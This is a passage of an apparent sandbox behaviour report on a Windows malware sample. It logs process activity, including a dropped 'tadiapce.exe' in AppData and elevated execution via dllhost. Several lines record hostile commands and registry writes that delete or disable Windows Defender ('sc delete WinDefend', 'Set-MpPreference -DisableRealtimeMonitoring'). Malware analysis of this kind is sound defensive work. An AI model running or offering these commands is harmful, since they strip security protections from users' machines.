| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Get Username | user_name_out = 2XC7u663GxWc |
|
10 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (125)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
116 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #13: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:00:47, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf14 |
| Parent PID | 0xedc (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F18
0x
F1C
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0xd00000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10897605 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12065838177 |
|
1 |
Process #14: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: RPC Server |
| Unmonitor | End Time: 00:01:01, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf84 |
| Parent PID | 0x250 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FA0
0x
F9C
0x
F98
0x
F94
0x
F90
0x
F8C
0x
F88
0x
FA4
0x
FA8
|
Process #15: tadiapce.exe
1110
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe |
| Command Line | "C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:01:14, Reason: Self Terminated |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfac |
| Parent PID | 0xf84 (c:\windows\system32\dllhost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FB0
0x
FB4
0x
FB8
0x
FBC
0x
FC0
0x
FCC
0x
FE0
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (9)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnRealtimeEnable, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableIOAVProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Get Info | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (52)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Crypt32.dll | base_address = 0x75610000 |
|
4 | |
| Load | kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x774c0000 |
|
2 | |
| Load | shell32.dll | base_address = 0x75bb0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x0 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x0 |
|
1 | |
| Load | bcrypt.dll | base_address = 0x0 |
|
1 | |
| Load | USER32.dll | base_address = 0x0 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x0 |
|
1 | |
| Load | USERENV.dll | base_address = 0x0 |
|
1 | |
| Load | ncrypt.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | IPHLPAPI.DLL | base_address = 0x0 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | base_address = 0x400000 |
|
5 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
1 | |
| Get Filename | - | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 255 |
|
1 | |
| Get Filename | KERNEL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260 |
|
1 | |
| Get Filename | SHELL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 512 |
|
1 | |
| Get Filename | SHELL32.dll | process_name = c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe, file_name_orig = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe, size = 260 |
|
1 | |
| Get Address | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | function = ___CPPdebugHook, address_out = 0x40e13c |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Borland32, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptStringToBinaryA, address_out = 0x75645d77 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyW, address_out = 0x774d1514 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegSetValueExW, address_out = 0x774d14d6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteA, address_out = 0x75df7078 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptAcquireContextA, address_out = 0x774c91dd |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptImportKey, address_out = 0x774cc532 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptEncrypt, address_out = 0x774e779b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = memcpy, address_out = 0x77364cc0 |
|
1 |
Service (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | Squirrel Shootout by Brenton Andrew Saunders | class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0 |
|
1 |
Keyboard (184)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_NUMLOCK, result_out = 1 |
|
56 | |
| Read | virtual_key_code = VK_LEFT, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_RIGHT, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_SPACE, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_RETURN, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_NUMPAD4, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_NUMPAD6, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_ADD, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_SUBTRACT, result_out = 0 |
|
16 |
System (835)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
578 | |
| Sleep | duration = 50 milliseconds (0.050 seconds) |
|
1 | |
| Sleep | duration = 3 milliseconds (0.003 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 10904204 |
|
249 | |
| Get Time | type = Local Time, time = 2019-05-14 15:31:23 (Local Time) |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\C850A606981932960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #16: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:01:06, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfc4 |
| Parent PID | 0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FC8
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x81c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a830000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:31 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10905281 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12932478875 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
